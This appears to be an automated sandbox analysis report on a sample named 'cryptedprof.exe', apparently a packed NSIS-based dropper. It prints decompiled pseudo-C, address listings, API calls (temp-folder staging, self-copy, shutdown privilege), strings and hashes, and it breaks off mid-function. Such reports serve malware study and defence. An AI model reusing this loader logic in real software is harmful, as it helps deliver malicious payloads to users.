							if(__eflags == 0) {
								_t55 =  &(_t55[1]);
								__eflags = _t55;
							}
							continue;
						} else {
							_t55 =  &(_t55[1]);
							__eflags =  *_t55 - 0x53;
							if( *_t55 != 0x53) {
								L20:
								__eflags =  *_t55 - ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC");
								if( *_t55 != ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC")) {
									L24:
									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=")) {
										 *((char*)(_t55 - 2)) = 0;
										__eflags =  &(_t55[2]);
										E0040624D("C:\\Users\\engineer\\AppData\\Local\\Temp",  &(_t55[2]));
										L30:
										_t157 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t157);
										_t59 = E00403455(_t172);
										_t173 = _t59;
										if(_t59 != 0) {
											L33:
											DeleteFileA("1033"); // executed
											_t61 = E00402EF1(_t175,  *(_t164 + 0x20)); // executed
											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
											if(_t61 != 0) {
												L43:
												E0040396E();
												__imp__OleUninitialize();
												_t185 =  *((intOrPtr*)(_t164 + 0x10));
												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
													__eflags =  *0x42f4f4;
													if( *0x42f4f4 == 0) {
														L67:
														_t63 =  *0x42f50c;
														__eflags = _t63 - 0xffffffff;
														if(_t63 != 0xffffffff) {
															 *(_t164 + 0x14) = _t63;
														}
														ExitProcess( *(_t164 + 0x14));
													}
													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
													__eflags = _t66;
													_t150 = 2;
													if(_t66 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
														 *(_t164 + 0x38) = 1;
														 *(_t164 + 0x44) = _t150;
														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
													}
													_t67 = E00406656(4);
													__eflags = _t67;
													if(_t67 == 0) {
														L65:
														_t68 = ExitWindowsEx(_t150, 0x80040002);
														__eflags = _t68;
														if(_t68 != 0) {
															goto L67;
														}
														goto L66;
													} else {
														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t70;
														if(_t70 == 0) {
															L66:
															E0040140B(9);
															goto L67;
														}
														goto L65;
													}
												}
												E00405969( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x42f460 == 0) {
												L42:
												 *0x42f50c =  *0x42f50c | 0xffffffff;
												 *(_t164 + 0x18) = E00403A60( *0x42f50c);
												goto L43;
											}
											_t153 = E00405C10(_t160, 0);
											if(_t153 < _t160) {
												L39:
												_t182 = _t153 - _t160;
												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
												if(_t153 < _t160) {
													_t151 = E004058D4(_t185);
													lstrcatA(_t157, "~nsu");
													if(_t151 != 0) {
														lstrcatA(_t157, "A");
													}
													lstrcatA(_t157, ".tmp");
													_t162 = "C:\\Users\\engineer\\Desktop";
													if(lstrcmpiA(_t157, "C:\\Users\\engineer\\Desktop") != 0) {
														_push(_t157);
														if(_t151 == 0) {
															E004058B7();
														} else {
															E0040583A();
														}
														SetCurrentDirectoryA(_t157);
														_t189 = "C:\\Users\\engineer\\AppData\\Local\\Temp"; // 0x43
														if(_t189 == 0) {
															E0040624D("C:\\Users\\engineer\\AppData\\Local\\Temp", _t162);
														}
														E0040624D(0x430000,  *(_t164 + 0x1c));
														_t137 = "A";
														_t163 = 0x1a;
														 *0x430400 = "A";
														do {
															E004062E0(0, 0x429478, _t157, 0x429478,  *((intOrPtr*)( *0x42f454 + 0x120)));
															DeleteFileA(0x429478);
															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\engineer\\Desktop\\cryptedprof.exe", 0x429478, 1) != 0) {
																E0040602C(_t137, 0x429478, 0);
																E004062E0(0, 0x429478, _t157, 0x429478,  *((intOrPtr*)( *0x42f454 + 0x124)));
																_t94 = E004058EC(0x429478);
																if(_t94 != 0) {
																	CloseHandle(_t94);
																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
																}
															}
															 *0x430400 =  *0x430400 + 1;
															_t163 = _t163 - 1;
														} while (_t163 != 0);
														E0040602C(_t137, _t157, 0);
													}
													goto L43;
												}
												 *_t153 = 0;
												_t154 = _t153 + 4;
												if(E00405CD3(_t182, _t153 + 4) == 0) {
													goto L43;
												}
												E0040624D("C:\\Users\\engineer\\AppData\\Local\\Temp", _t154);
												E0040624D("C:\\Users\\engineer\\AppData\\Local\\Temp", _t154);
												 *((intOrPtr*)(_t164 + 0x10)) = 0;
												goto L42;
											}
											_t110 = (( *0x40a1bf << 0x00000008 |  *0x40a1be) << 0x00000008 |  *0x40a1bd) << 0x00000008 | " _?=";
											while( *_t153 != _t110) {
												_t153 = _t153 - 1;
												if(_t153 >= _t160) {
													continue;
												}
												goto L39;
											}
											goto L39;
										}
										GetWindowsDirectoryA(_t157, 0x3fb);
										lstrcatA(_t157, "\\Temp");
										_t113 = E00403455(_t173);
										_t174 = _t113;
										if(_t113 != 0) {
											goto L33;
										}
										GetTempPathA(0x3fc, _t157);
										lstrcatA(_t157, "Low");
										SetEnvironmentVariableA("TEMP", _t157);
										SetEnvironmentVariableA("TMP", _t157);
										_t118 = E00403455(_t174);
										_t175 = _t118;
										if(_t118 == 0) {
											goto L43;
										}
										goto L33;
									}
									goto L25;
								}
								_t141 = _t55[4];
								__eflags = _t141 - 0x20;
								if(_t141 == 0x20) {
									L23:
									_t15 = _t164 + 0x20;
									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L24;
								}
								__eflags = _t141;
								if(_t141 != 0) {
									goto L24;
								}
								goto L23;
							}
							_t142 = _t55[1];
							__eflags = _t142 - 0x20;
							if(_t142 == 0x20) {
								L19:
								 *0x42f500 = 1;
								goto L20;
							}
							__eflags = _t142;
							if(_t142 != 0) {
								goto L20;
							}
							goto L19;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t55 =  &(_t55[1]);
						__eflags =  *_t55 - 0x20;
					} while ( *_t55 == 0x20);
					goto L13;
				}
				goto L30;
			}

































                                                                                        0x00403496
                                                                                        0x0040349a
                                                                                        0x004034a2
                                                                                        0x004034a6
                                                                                        0x004034ab
                                                                                        0x004034b7
                                                                                        0x004034c0
                                                                                        0x004034c5
                                                                                        0x004034c8
                                                                                        0x004034cf
                                                                                        0x004034d6
                                                                                        0x004034d6
                                                                                        0x004034cf
                                                                                        0x004034d8
                                                                                        0x004034dd
                                                                                        0x004034de
                                                                                        0x004034ea
                                                                                        0x004034ee
                                                                                        0x004034f4
                                                                                        0x00403502
                                                                                        0x00403507
                                                                                        0x0040350e
                                                                                        0x00403512
                                                                                        0x00403516
                                                                                        0x00403518
                                                                                        0x00403518
                                                                                        0x00403516
                                                                                        0x00403520
                                                                                        0x00403527
                                                                                        0x0040352d
                                                                                        0x00403543
                                                                                        0x00403553
                                                                                        0x00403558
                                                                                        0x0040355e
                                                                                        0x00403565
                                                                                        0x00403571
                                                                                        0x0040357b
                                                                                        0x0040357d
                                                                                        0x0040357f
                                                                                        0x00403584
                                                                                        0x00403584
                                                                                        0x00403594
                                                                                        0x0040359a
                                                                                        0x00403663
                                                                                        0x00403663
                                                                                        0x00403665
                                                                                        0x00403667
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004035a3
                                                                                        0x004035a6
                                                                                        0x004035ae
                                                                                        0x004035ae
                                                                                        0x004035b1
                                                                                        0x004035b6
                                                                                        0x004035b8
                                                                                        0x004035b8
                                                                                        0x004035b9
                                                                                        0x004035b9
                                                                                        0x004035be
                                                                                        0x004035c1
                                                                                        0x00403653
                                                                                        0x00403658
                                                                                        0x0040365d
                                                                                        0x00403660
                                                                                        0x00403662
                                                                                        0x00403662
                                                                                        0x00403662
                                                                                        0x00000000
                                                                                        0x004035c7
                                                                                        0x004035c7
                                                                                        0x004035c8
                                                                                        0x004035cb
                                                                                        0x004035e3
                                                                                        0x0040360e
                                                                                        0x00403610
                                                                                        0x00403623
                                                                                        0x0040364e
                                                                                        0x00403651
                                                                                        0x0040366f
                                                                                        0x00403672
                                                                                        0x0040367b
                                                                                        0x00403680
                                                                                        0x00403686
                                                                                        0x00403691
                                                                                        0x00403693
                                                                                        0x00403698
                                                                                        0x0040369a
                                                                                        0x004036f2
                                                                                        0x004036f7
                                                                                        0x00403701
                                                                                        0x00403708
                                                                                        0x0040370c
                                                                                        0x004037a0
                                                                                        0x004037a0
                                                                                        0x004037a5
                                                                                        0x004037ab
                                                                                        0x004037b0
                                                                                        0x004038d4
                                                                                        0x004038da
                                                                                        0x00403956
                                                                                        0x00403956
                                                                                        0x0040395b
                                                                                        0x0040395e
                                                                                        0x00403960
                                                                                        0x00403960
                                                                                        0x00403968
                                                                                        0x00403968
                                                                                        0x004038ea
                                                                                        0x004038f2
                                                                                        0x004038f4
                                                                                        0x004038f5
                                                                                        0x00403902
                                                                                        0x00403915
                                                                                        0x0040391d
                                                                                        0x00403921
                                                                                        0x00403921
                                                                                        0x00403929
                                                                                        0x0040392e
                                                                                        0x00403935
                                                                                        0x00403943
                                                                                        0x00403945
                                                                                        0x0040394b
                                                                                        0x0040394d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403937
                                                                                        0x0040393d
                                                                                        0x0040393f
                                                                                        0x00403941
                                                                                        0x0040394f
                                                                                        0x00403951
                                                                                        0x00000000
                                                                                        0x00403951
                                                                                        0x00000000
                                                                                        0x00403941
                                                                                        0x00403935
                                                                                        0x004037bf
                                                                                        0x004037c6
                                                                                        0x004037c6
                                                                                        0x00403718
                                                                                        0x00403790
                                                                                        0x00403790
                                                                                        0x0040379c
                                                                                        0x00000000
                                                                                        0x0040379c
                                                                                        0x00403721
                                                                                        0x00403725
                                                                                        0x0040375b
                                                                                        0x0040375b
                                                                                        0x0040375d
                                                                                        0x00403765
                                                                                        0x004037d7
                                                                                        0x004037d9
                                                                                        0x004037e0
                                                                                        0x004037e8
                                                                                        0x004037e8
                                                                                        0x004037f3
                                                                                        0x004037f8
                                                                                        0x00403807
                                                                                        0x0040380b
                                                                                        0x0040380c
                                                                                        0x00403815
                                                                                        0x0040380e
                                                                                        0x0040380e
                                                                                        0x0040380e
                                                                                        0x0040381b
                                                                                        0x00403821
                                                                                        0x00403827
                                                                                        0x0040382f
                                                                                        0x0040382f
                                                                                        0x0040383d
                                                                                        0x00403842
                                                                                        0x00403854
                                                                                        0x0040385c
                                                                                        0x00403862
                                                                                        0x0040386e
                                                                                        0x00403874
                                                                                        0x0040387e
                                                                                        0x00403894
                                                                                        0x004038a5
                                                                                        0x004038ab
                                                                                        0x004038b2
                                                                                        0x004038b5
                                                                                        0x004038bb
                                                                                        0x004038bb
                                                                                        0x004038b2
                                                                                        0x004038bf
                                                                                        0x004038c5
                                                                                        0x004038c5
                                                                                        0x004038ca
                                                                                        0x004038ca
                                                                                        0x00000000
                                                                                        0x00403807
                                                                                        0x00403767
                                                                                        0x00403769
                                                                                        0x00403774
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040377c
                                                                                        0x00403787
                                                                                        0x0040378c
                                                                                        0x00000000
                                                                                        0x0040378c
                                                                                        0x00403750
                                                                                        0x00403752
                                                                                        0x00403756
                                                                                        0x00403759
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403759
                                                                                        0x00000000
                                                                                        0x00403752
                                                                                        0x004036a2
                                                                                        0x004036ae
                                                                                        0x004036b3
                                                                                        0x004036b8
                                                                                        0x004036ba
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004036c2
                                                                                        0x004036ca
                                                                                        0x004036db
                                                                                        0x004036e3
                                                                                        0x004036e5
                                                                                        0x004036ea
                                                                                        0x004036ec
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004036ec
                                                                                        0x00000000
                                                                                        0x00403651
                                                                                        0x00403612
                                                                                        0x00403615
                                                                                        0x00403618
                                                                                        0x0040361e
                                                                                        0x0040361e
                                                                                        0x0040361e
                                                                                        0x0040361e
                                                                                        0x00000000
                                                                                        0x0040361e
                                                                                        0x0040361a
                                                                                        0x0040361c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040361c
                                                                                        0x004035cd
                                                                                        0x004035d0
                                                                                        0x004035d3
                                                                                        0x004035d9
                                                                                        0x004035d9
                                                                                        0x00000000
                                                                                        0x004035d9
                                                                                        0x004035d5
                                                                                        0x004035d7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004035d7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004035a8
                                                                                        0x004035a8
                                                                                        0x004035a8
                                                                                        0x004035a9
                                                                                        0x004035a9
                                                                                        0x00000000
                                                                                        0x004035a8
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE ref: 004034AB
                                                                                        • GetVersion.KERNEL32 ref: 004034B1
                                                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034E4
                                                                                        • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 00403520
                                                                                        • OleInitialize.OLE32(00000000), ref: 00403527
                                                                                        • SHGetFileInfoA.SHELL32(00429878,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403543
                                                                                        • GetCommandLineA.KERNEL32(Setup Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00403558
                                                                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\cryptedprof.exe" ,00000020,"C:\Users\user\Desktop\cryptedprof.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00403594
                                                                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403691
                                                                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 004036A2
                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036AE
                                                                                        • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036C2
                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036CA
                                                                                        • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036DB
                                                                                        • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036E3
                                                                                        • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004036F7
                                                                                          • Part of subcall function 00406656: GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
                                                                                          • Part of subcall function 00406656: GetProcAddress.KERNEL32(00000000,?), ref: 00406683
                                                                                          • Part of subcall function 00403A60: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,747DFA90), ref: 00403B50
                                                                                          • Part of subcall function 00403A60: lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000), ref: 00403B63
                                                                                          • Part of subcall function 00403A60: GetFileAttributesA.KERNEL32(Call), ref: 00403B6E
                                                                                          • Part of subcall function 00403A60: LoadImageA.USER32 ref: 00403BB7
                                                                                          • Part of subcall function 00403A60: RegisterClassA.USER32 ref: 00403BF4
                                                                                          • Part of subcall function 0040396E: CloseHandle.KERNEL32(000002C8,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403980
                                                                                          • Part of subcall function 0040396E: CloseHandle.KERNEL32(000002A8,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403994
                                                                                        • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 004037A5
                                                                                        • ExitProcess.KERNEL32 ref: 004037C6
                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004038E3
                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004038EA
                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403902
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403921
                                                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403945
                                                                                        • ExitProcess.KERNEL32 ref: 00403968
                                                                                          • Part of subcall function 00405969: MessageBoxIndirectA.USER32(0040A230), ref: 004059C4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Process$ExitFileHandle$CloseEnvironmentPathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                                                        • String ID: "$"C:\Users\user\Desktop\cryptedprof.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\cryptedprof.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$Setup Setup$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                        • API String ID: 538718688-2116708269
                                                                                        • Opcode ID: bce7611ef083b11c86201e58ac83bb6660836d391cee400c05623c2e8ee166ca
                                                                                        • Instruction ID: 85d02637fd436e9256356bfe7db61a6cd0141c067df2f5210ca69e4cdec71f05
                                                                                        • Opcode Fuzzy Hash: bce7611ef083b11c86201e58ac83bb6660836d391cee400c05623c2e8ee166ca
                                                                                        • Instruction Fuzzy Hash: C9C125705047416AD7217F719D49B2B3EACAF4170AF45487FF482B61E2CB7C8A198B2E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 70991A98, Relevance: 25.1, APIs: 13, Strings: 1, Instructions: 591stringlibrarymemoryCOMMONCrypto
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 95%
                                                                                        			E70991A98() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				CHAR* _v24;
				CHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				CHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				CHAR* _t207;
				signed int _t210;
				void* _t212;
				void* _t214;
				CHAR* _t216;
				void* _t224;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t228;
				signed short _t230;
				struct HINSTANCE__* _t233;
				struct HINSTANCE__* _t235;
				void* _t236;
				char* _t237;
				void* _t248;
				signed char _t249;
				signed int _t250;
				void* _t254;
				struct HINSTANCE__* _t256;
				void* _t257;
				signed int _t259;
				intOrPtr _t260;
				char* _t263;
				signed int _t268;
				signed int _t271;
				signed int _t273;
				void* _t276;
				void* _t280;
				struct HINSTANCE__* _t282;
				intOrPtr _t285;
				void _t286;
				signed int _t287;
				signed int _t299;
				signed int _t300;
				intOrPtr _t303;
				void* _t304;
				signed int _t308;
				signed int _t311;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				intOrPtr _t319;
				intOrPtr* _t320;
				CHAR* _t321;
				CHAR* _t323;
				CHAR* _t324;
				struct HINSTANCE__* _t325;
				void* _t327;
				signed int _t328;
				void* _t329;

				_t282 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t329 = 0;
				_v52 = 0;
				_v44 = 0;
				_t207 = E70991215();
				_v24 = _t207;
				_v28 = _t207;
				_v48 = E70991215();
				_t320 = E7099123B();
				_v56 = _t320;
				_v12 = _t320;
				while(1) {
					_t210 = _v32;
					_v60 = _t210;
					if(_t210 != _t282 && _t329 == _t282) {
						break;
					}
					_t319 =  *_t320;
					_t285 = _t319;
					_t212 = _t285 - _t282;
					if(_t212 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t214 = _v60 - _t282;
						if(_t214 == 0) {
							 *_v28 =  *_v28 & 0x00000000;
							__eflags = _t329 - _t282;
							if(_t329 == _t282) {
								_t254 = GlobalAlloc(0x40, 0x14a4); // executed
								_t329 = _t254;
								 *(_t329 + 0x810) = _t282;
								 *(_t329 + 0x814) = _t282;
							}
							_t286 = _v36;
							_t47 = _t329 + 8; // 0x8
							_t216 = _t47;
							_t48 = _t329 + 0x408; // 0x408
							_t321 = _t48;
							 *_t329 = _t286;
							 *_t216 =  *_t216 & 0x00000000;
							 *(_t329 + 0x808) = _t282;
							 *_t321 =  *_t321 & 0x00000000;
							_t287 = _t286 - _t282;
							__eflags = _t287;
							 *(_t329 + 0x80c) = _t282;
							 *(_t329 + 4) = _t282;
							if(_t287 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t327 = 0;
								GlobalFree(_t329);
								_t329 = E709912FE(_v24);
								__eflags = _t329 - _t282;
								if(_t329 == _t282) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t248 =  *(_t329 + 0x14a0);
									__eflags = _t248 - _t282;
									if(_t248 == _t282) {
										break;
									}
									_t327 = _t329;
									_t329 = _t248;
									__eflags = _t329 - _t282;
									if(_t329 != _t282) {
										continue;
									}
									break;
								}
								__eflags = _t327 - _t282;
								if(_t327 != _t282) {
									 *(_t327 + 0x14a0) = _t282;
								}
								_t249 =  *(_t329 + 0x810);
								__eflags = _t249 & 0x00000008;
								if((_t249 & 0x00000008) == 0) {
									_t250 = _t249 | 0x00000002;
									__eflags = _t250;
									 *(_t329 + 0x810) = _t250;
								} else {
									_t329 = E70991534(_t329);
									 *(_t329 + 0x810) =  *(_t329 + 0x810) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t299 = _t287 - 1;
								__eflags = _t299;
								if(_t299 == 0) {
									L31:
									lstrcpyA(_t216, _v48);
									L32:
									lstrcpyA(_t321, _v24);
									goto L42;
								}
								_t300 = _t299 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									goto L32;
								}
								__eflags = _t300 != 1;
								if(_t300 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t214 == 1) {
								_t256 = _v16;
								if(_v40 == _t282) {
									_t256 = _t256 - 1;
								}
								 *(_t329 + 0x814) = _t256;
							}
							L42:
							_v12 = _v12 + 1;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t320 = _v12;
								continue;
							}
							break;
						}
					}
					_t257 = _t212 - 0x23;
					if(_t257 == 0) {
						__eflags = _t320 - _v56;
						if(_t320 <= _v56) {
							L17:
							__eflags = _v44 - _t282;
							if(_v44 != _t282) {
								L43:
								_t259 = _v32 - _t282;
								__eflags = _t259;
								if(_t259 == 0) {
									_t260 = _t319;
									while(1) {
										__eflags = _t260 - 0x22;
										if(_t260 != 0x22) {
											break;
										}
										_t320 = _t320 + 1;
										__eflags = _v44 - _t282;
										_v12 = _t320;
										if(_v44 == _t282) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[1]);
											 *_v28 =  *_t320;
											L58:
											_t328 = _t320 + 1;
											__eflags = _t328;
											_v12 = _t328;
											goto L59;
										}
										_t260 =  *_t320;
										_v44 = _t282;
									}
									__eflags = _t260 - 0x2a;
									if(_t260 == 0x2a) {
										_v36 = 2;
										L57:
										_t320 = _v12;
										_v28 = _v24;
										_t282 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t260 - 0x2d;
									if(_t260 == 0x2d) {
										L151:
										_t303 =  *_t320;
										__eflags = _t303 - 0x2d;
										if(_t303 != 0x2d) {
											L154:
											_t263 = _t320 + 1;
											__eflags =  *_t263 - 0x3a;
											if( *_t263 != 0x3a) {
												goto L162;
											}
											__eflags = _t303 - 0x2d;
											if(_t303 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t263;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 =  *_v48 & 0x00000000;
											} else {
												 *_v28 =  *_v28 & 0x00000000;
												lstrcpyA(_v48, _v24);
											}
											goto L57;
										}
										_t263 = _t320 + 1;
										__eflags =  *_t263 - 0x3e;
										if( *_t263 != 0x3e) {
											goto L154;
										}
										_v36 = 3;
										goto L157;
									}
									__eflags = _t260 - 0x3a;
									if(_t260 != 0x3a) {
										goto L162;
									}
									goto L151;
								}
								_t268 = _t259 - 1;
								__eflags = _t268;
								if(_t268 == 0) {
									L80:
									_t304 = _t285 + 0xffffffde;
									__eflags = _t304 - 0x55;
									if(_t304 > 0x55) {
										goto L57;
									}
									switch( *((intOrPtr*)(( *(_t304 + 0x70992259) & 0x000000ff) * 4 +  &M709921CD))) {
										case 0:
											__eax = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												_v12 = __edi;
												__cl =  *__edi;
												__eflags = __cl - __dl;
												if(__cl != __dl) {
													goto L132;
												}
												L131:
												__eflags =  *(__edi + 1) - __dl;
												if( *(__edi + 1) != __dl) {
													L136:
													 *__eax =  *__eax & 0x00000000;
													__eax = E70991224(_v24);
													__ebx = __eax;
													goto L97;
												}
												L132:
												__eflags = __cl;
												if(__cl == 0) {
													goto L136;
												}
												__eflags = __cl - __dl;
												if(__cl == __dl) {
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__cl =  *__edi;
												 *__eax =  *__edi;
												__eax = __eax + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__cl =  *__edi;
												__eflags = __cl - __dl;
												if(__cl != __dl) {
													goto L132;
												}
												goto L131;
											}
										case 1:
											_v8 = 1;
											goto L57;
										case 2:
											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 1;
											__ebx = E70991215();
											 &_v12 = E70991A36( &_v12);
											__eax = E70991429(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											L105:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L123;
										case 7:
											_push(0x19);
											goto L143;
										case 8:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L107;
										case 9:
											_push(0x15);
											goto L143;
										case 0xa:
											_push(0x16);
											goto L143;
										case 0xb:
											_push(0x18);
											goto L143;
										case 0xc:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L118;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L109;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L111;
										case 0xf:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L122;
										case 0x10:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L113;
										case 0x11:
											_push(3);
											goto L123;
										case 0x12:
											_push(0x17);
											L143:
											_pop(__ebx);
											goto L98;
										case 0x13:
											__eax =  &_v12;
											__eax = E70991A36( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											__eflags = __ebx - 0xb;
											if(__ebx < 0xb) {
												__ebx = __ebx + 0xa;
											}
											goto L97;
										case 0x14:
											__ebx = 0xffffffff;
											goto L98;
										case 0x15:
											__eax = 0;
											__eflags = 0;
											goto L116;
										case 0x16:
											__ecx = 0;
											__eflags = 0;
											goto L91;
										case 0x17:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L120;
										case 0x18:
											_t270 =  *(_t329 + 0x814);
											__eflags = _t270 - _v16;
											if(_t270 > _v16) {
												_v16 = _t270;
											}
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
